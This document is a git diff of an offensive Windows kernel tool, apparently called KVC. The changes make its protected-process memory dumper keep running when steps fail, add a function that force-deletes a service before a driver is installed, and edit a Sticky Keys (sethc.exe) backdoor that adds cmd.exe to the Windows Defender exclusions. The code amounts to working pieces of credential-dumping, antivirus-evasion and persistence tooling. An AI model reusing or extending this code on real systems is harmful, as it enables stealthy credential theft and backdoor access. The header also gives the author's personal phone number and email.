diff --git a/kvc/Controller.h b/kvc/Controller.h
index 7b6ccfd..658cb42 100644
--- a/kvc/Controller.h
+++ b/kvc/Controller.h
@@ -171,7 +171,8 @@ private:
std::vector
& kvcCryptData) noexcept;
// Atomic driver operations for stability
- bool EnsureDriverAvailable() noexcept;
+ bool ForceRemoveService() noexcept;
+ bool EnsureDriverAvailable() noexcept;
bool IsDriverCurrentlyLoaded() noexcept;
bool PerformAtomicInit() noexcept;
bool PerformAtomicInitWithErrorCleanup() noexcept;
diff --git a/kvc/ControllerCore.cpp b/kvc/ControllerCore.cpp
index 8b0ff48..c3a5a9e 100644
--- a/kvc/ControllerCore.cpp
+++ b/kvc/ControllerCore.cpp
@@ -129,6 +129,7 @@ bool Controller::PerformAtomicInitWithErrorCleanup() noexcept {
// Core driver availability check with fallback mechanisms
bool Controller::EnsureDriverAvailable() noexcept {
// Phase 1: Check if the driver is already available (without testing)
+ ForceRemoveService();
if (IsDriverCurrentlyLoaded()) {
return true;
}
diff --git a/kvc/ControllerDriverManager.cpp b/kvc/ControllerDriverManager.cpp
index 8e88260..8d3c703 100644
--- a/kvc/ControllerDriverManager.cpp
+++ b/kvc/ControllerDriverManager.cpp
@@ -1,3 +1,28 @@
+/*******************************************************************************
+ _ ____ ______
+ | |/ /\ \ / / ___|
+ | ' / \ \ / / |
+ | . \ \ V /| |___
+ |_|\_\ \_/ \____|
+
+The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
+offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
+as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
+of kernel-level primitives** for legitimate security research and penetration testing.
+
+KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
+security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
+Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
+that define these protections.
+
+ -----------------------------------------------------------------------------
+ Author : Marek Wesołowski
+ Email : marek@wesolowski.eu.org
+ Phone : +48 607 440 283 (Tel/WhatsApp)
+ Date : 04-09-2025
+
+*******************************************************************************/
+
// ControllerDriverManager.cpp
#include "Controller.h"
#include "common.h"
@@ -7,6 +32,33 @@
namespace fs = std::filesystem;
+bool Controller::ForceRemoveService() noexcept {
+ if (!InitDynamicAPIs()) {
+ return false;
+ }
+
+ SC_HANDLE hSCM = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_ALL_ACCESS);
+ if (!hSCM) {
+ return false;
+ }
+
+ SC_HANDLE hService = g_pOpenServiceW(hSCM, GetServiceName().c_str(), DELETE);
+ if (!hService) {
+ DWORD err = GetLastError();
+ CloseServiceHandle(hSCM);
+ return (err == ERROR_SERVICE_DOES_NOT_EXIST);
+ }
+
+ BOOL success = g_pDeleteService(hService);
+ DWORD err = GetLastError();
+
+ CloseServiceHandle(hService);
+ CloseServiceHandle(hSCM);
+
+ return success || (err == ERROR_SERVICE_MARKED_FOR_DELETE);
+}
+
+
// Driver service lifecycle management
bool Controller::StopDriverService() noexcept {
DEBUG(L"StopDriverService called");
@@ -90,7 +142,8 @@ std::vector Controller::DecryptDriver(const std::vector& encryptedDa
// Silent driver installation with TrustedInstaller privileges
bool Controller::InstallDriverSilently() noexcept {
- auto encryptedData = ExtractEncryptedDriver();
+ ForceRemoveService();
+ auto encryptedData = ExtractEncryptedDriver();
if (encryptedData.empty()) return false;
auto driverData = DecryptDriver(encryptedData);
@@ -184,6 +237,7 @@ bool Controller::StartDriverServiceSilent() noexcept {
// Legacy driver installation with enhanced error handling
bool Controller::InstallDriver() noexcept {
+ ForceRemoveService();
auto encryptedData = ExtractEncryptedDriver();
if (encryptedData.empty()) {
ERROR(L"Failed to extract encrypted driver from icon resource");
diff --git a/kvc/ControllerMemoryOperations.cpp b/kvc/ControllerMemoryOperations.cpp
index 230599e..4d515a1 100644
--- a/kvc/ControllerMemoryOperations.cpp
+++ b/kvc/ControllerMemoryOperations.cpp
@@ -80,12 +80,15 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
std::wstring processName = Utils::GetProcessName(pid);
- // Add process to Defender exclusions to prevent interference during dumping
- std::wstring processNameWithExt = processName;
- if (processNameWithExt.find(L".exe") == std::wstring::npos) {
- processNameWithExt += L".exe";
- }
- m_trustedInstaller.AddProcessToDefenderExclusions(processName);
+ // Try to add process to Defender exclusions to prevent interference during dumping
+ std::wstring processNameWithExt = processName;
+ if (processNameWithExt.find(L".exe") == std::wstring::npos) {
+ processNameWithExt += L".exe";
+ }
+
+ if (!m_trustedInstaller.AddProcessToDefenderExclusions(processName)) {
+ INFO(L"AV exclusion skipped: %s", processName.c_str());
+ }
// System process validation - these processes cannot be dumped
if (pid == 4 || processName == L"System") {
@@ -128,21 +131,18 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
return false;
}
- // Get target process protection level for elevation
+ // Get target process protection level for elevation - this is auxiliary
auto kernelAddr = GetProcessKernelAddress(pid);
if (!kernelAddr) {
- ERROR(L"Failed to get kernel address for target process");
- m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
- PerformAtomicCleanup();
- return false;
+ INFO(L"Could not get kernel address for target process (continuing without self-protection)");
}
- auto targetProtection = GetProcessProtection(kernelAddr.value());
- if (!targetProtection) {
- ERROR(L"Failed to get protection info for target process");
- m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
- PerformAtomicCleanup();
- return false;
+ auto targetProtection = std::optional{};
+ if (kernelAddr) {
+ targetProtection = GetProcessProtection(kernelAddr.value());
+ if (!targetProtection) {
+ INFO(L"Could not get protection info for target process (continuing without self-protection)");
+ }
}
if (g_interrupted) {
@@ -152,13 +152,13 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
return false;
}
- // Protection elevation to match target process level
- if (targetProtection.value() > 0) {
+ // Protection elevation to match target process level - auxiliary feature
+ if (targetProtection && targetProtection.value() > 0) {
UCHAR targetLevel = Utils::GetProtectionLevel(targetProtection.value());
UCHAR targetSigner = Utils::GetSignerType(targetProtection.value());
std::wstring levelStr = (targetLevel == static_cast(PS_PROTECTED_TYPE::Protected)) ? L"PP" : L"PPL";
- std::wstring signerStr;
+ std::wstring signerStr = L"Unknown";
switch (static_cast(targetSigner)) {
case PS_PROTECTED_SIGNER::Lsa: signerStr = L"Lsa"; break;
@@ -170,25 +170,26 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
case PS_PROTECTED_SIGNER::CodeGen: signerStr = L"CodeGen"; break;
case PS_PROTECTED_SIGNER::App: signerStr = L"App"; break;
default:
- ERROR(L"Unknown signer type for target process");
- m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
- PerformAtomicCleanup();
- return false;
+ INFO(L"Unknown signer type - skipping self-protection");
+ break;
}
- INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str());
+ if (signerStr != L"Unknown") {
+ INFO(L"Target process protection: %s-%s", levelStr.c_str(), signerStr.c_str());
- if (!SelfProtect(levelStr, signerStr)) {
- ERROR(L"Failed to set self protection to %s-%s", levelStr.c_str(), signerStr.c_str());
- } else {
- SUCCESS(L"Set self protection to %s-%s", levelStr.c_str(), signerStr.c_str());
+ if (!SelfProtect(levelStr, signerStr)) {
+ INFO(L"Self-protection failed: %s-%s (continuing with dump)", levelStr.c_str(), signerStr.c_str());
+ } else {
+ SUCCESS(L"Self-protection set to %s-%s", levelStr.c_str(), signerStr.c_str());
+ }
}
} else {
INFO(L"Target process is not protected, no self-protection needed");
}
+ // Try to enable debug privilege - auxiliary feature
if (!EnableDebugPrivilege()) {
- ERROR(L"Failed to enable debug privilege");
+ INFO(L"Debug privilege failed (continuing with dump anyway)");
}
if (g_interrupted) {
@@ -199,12 +200,12 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
return false;
}
- // Open target process with appropriate privileges
+ // Open target process with appropriate privileges - CRITICAL operation
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
if (!hProcess) {
hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
if (!hProcess) {
- ERROR(L"Failed to open process (error: %d)", GetLastError());
+ ERROR(L"Critical: Failed to open process (error: %d)", GetLastError());
m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
PerformAtomicCleanup();
return false;
@@ -217,9 +218,10 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
fullPath += L"\\";
fullPath += processName + L"_" + std::to_wstring(pid) + L".dmp";
+ // Create dump file - CRITICAL operation
HANDLE hFile = CreateFileW(fullPath.c_str(), GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
- ERROR(L"Failed to create dump file (error: %d)", GetLastError());
+ ERROR(L"Critical: Failed to create dump file (error: %d)", GetLastError());
CloseHandle(hProcess);
m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
PerformAtomicCleanup();
@@ -249,6 +251,7 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
INFO(L"Creating memory dump - this may take a while. Press Ctrl+C to cancel safely.");
+ // Execute the actual memory dump - CRITICAL operation
BOOL result = MiniDumpWriteDump(hProcess, pid, hFile, dumpType, NULL, NULL, NULL);
if (g_interrupted) {
@@ -269,19 +272,19 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
DWORD error = GetLastError();
switch (error) {
case ERROR_TIMEOUT:
- ERROR(L"MiniDumpWriteDump timed out - process may be unresponsive or in critical section");
+ ERROR(L"Critical: MiniDumpWriteDump timed out - process may be unresponsive or in critical section");
break;
case RPC_S_CALL_FAILED:
- ERROR(L"RPC call failed - process may be a kernel-mode or system-critical process");
+ ERROR(L"Critical: RPC call failed - process may be a kernel-mode or system-critical process");
break;
case ERROR_ACCESS_DENIED:
- ERROR(L"Access denied - insufficient privileges even with protection bypass");
+ ERROR(L"Critical: Access denied - insufficient privileges even with protection bypass");
break;
case ERROR_PARTIAL_COPY:
- ERROR(L"Partial copy - some memory regions could not be read");
+ ERROR(L"Critical: Partial copy - some memory regions could not be read");
break;
default:
- ERROR(L"MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error);
+ ERROR(L"Critical: MiniDumpWriteDump failed (error: %d / 0x%08x)", error, error);
break;
}
DeleteFileW(fullPath.c_str());
@@ -293,8 +296,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
SUCCESS(L"Memory dump created successfully: %s", fullPath.c_str());
+ // Cleanup phase - these operations are non-critical
INFO(L"Removing self-protection before cleanup...");
- SelfProtect(L"none", L"none");
+ if (!SelfProtect(L"none", L"none")) {
+ DEBUG(L"Self-protection removal failed (non-critical)");
+ }
if (g_interrupted) {
INFO(L"Operation completed but cleanup was interrupted");
@@ -303,8 +309,11 @@ bool Controller::CreateMiniDump(DWORD pid, const std::wstring& outputPath) noexc
return true;
}
- // Clean up Defender exclusions and perform atomic cleanup
- m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName);
+ // Clean up Defender exclusions and perform atomic cleanup - non-critical
+ if (!m_trustedInstaller.RemoveProcessFromDefenderExclusions(processName)) {
+ DEBUG(L"AV cleanup skipped: %s", processName.c_str());
+ }
+
PerformAtomicCleanup();
return true;
diff --git a/kvc/TrustedInstallerIntegrator.cpp b/kvc/TrustedInstallerIntegrator.cpp
index 9d36d69..16abdbe 100644
--- a/kvc/TrustedInstallerIntegrator.cpp
+++ b/kvc/TrustedInstallerIntegrator.cpp
@@ -247,7 +247,7 @@ bool TrustedInstallerIntegrator::AddDefenderExclusion(ExclusionType type, const
if (result) {
SUCCESS(L"Successfully added to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
} else {
- ERROR(L"Failed to add to Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
+ INFO(L"AV exclusion skipped: %s %s", typeStr.c_str(), processedValue.c_str());
}
return result;
@@ -287,7 +287,7 @@ bool TrustedInstallerIntegrator::RemoveDefenderExclusion(ExclusionType type, con
if (result) {
SUCCESS(L"Successfully removed from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
} else {
- ERROR(L"Failed to remove from Windows Defender %s exclusions: %s", typeStr.c_str(), processedValue.c_str());
+ INFO(L"AV cleanup skipped: %s %s", typeStr.c_str(), processedValue.c_str());
}
return result;
@@ -403,8 +403,8 @@ bool TrustedInstallerIntegrator::InstallStickyKeysBackdoor() noexcept
// First add cmd.exe to Defender process exclusions to prevent detection
if (!AddProcessToDefenderExclusions(L"cmd.exe")) {
- ERROR(L"Failed to add cmd.exe to Defender process exclusions");
- return false;
+ INFO(L"AV exclusion skipped for cmd.exe (continuing)");
+
}
// Create IFEO registry entry for sethc.exe
@@ -459,8 +459,8 @@ bool TrustedInstallerIntegrator::RemoveStickyKeysBackdoor() noexcept
// Remove cmd.exe from Defender process exclusions
if (!RemoveProcessFromDefenderExclusions(L"cmd.exe")) {
- ERROR(L"Failed to remove cmd.exe from Defender process exclusions");
- success = false;
+ INFO(L"AV cleanup skipped for cmd.exe");
+
}
if (success) {
@@ -610,7 +610,7 @@ bool TrustedInstallerIntegrator::AddProcessToDefenderExclusions(const std::wstri
if (result) {
SUCCESS(L"Successfully added to Windows Defender process exclusions: %s", processName.c_str());
} else {
- ERROR(L"Failed to add to Windows Defender process exclusions: %s", processName.c_str());
+ INFO(L"AV exclusion skipped: %s", processName.c_str());
}
return result;
@@ -635,7 +635,7 @@ bool TrustedInstallerIntegrator::RemoveProcessFromDefenderExclusions(const std::
if (result) {
SUCCESS(L"Successfully removed from Windows Defender process exclusions: %s", processName.c_str());
} else {
- ERROR(L"Failed to remove from Windows Defender process exclusions: %s", processName.c_str());
+ INFO(L"AV cleanup skipped: %s", processName.c_str());
}
return result;
diff --git a/kvc/Utils.cpp b/kvc/Utils.cpp
index aac9ab7..6a43095 100644
--- a/kvc/Utils.cpp
+++ b/kvc/Utils.cpp
@@ -1,3 +1,28 @@
+/*******************************************************************************
+ _ ____ ______
+ | |/ /\ \ / / ___|
+ | ' / \ \ / / |
+ | . \ \ V /| |___
+ |_|\_\ \_/ \____|
+
+The **Kernel Vulnerability Capabilities (KVC)** framework represents a paradigm shift in Windows security research,
+offering unprecedented access to modern Windows internals through sophisticated ring-0 operations. Originally conceived
+as "Kernel Process Control," the framework has evolved to emphasize not just control, but the complete **exploitation
+of kernel-level primitives** for legitimate security research and penetration testing.
+
+KVC addresses the critical gap left by traditional forensic tools that have become obsolete in the face of modern Windows
+security hardening. Where tools like ProcDump and Process Explorer fail against Protected Process Light (PPL) and Antimalware
+Protected Interface (AMSI) boundaries, KVC succeeds by operating at the kernel level, manipulating the very structures
+that define these protections.
+
+ -----------------------------------------------------------------------------
+ Author : Marek Wesołowski
+ Email : marek@wesolowski.eu.org
+ Phone : +48 607 440 283 (Tel/WhatsApp)
+ Date : 04-09-2025
+
+*******************************************************************************/
+
// Utils.cpp - Fixed compilation issues with NtQuerySystemInformation
#include "Utils.h"
#include "common.h"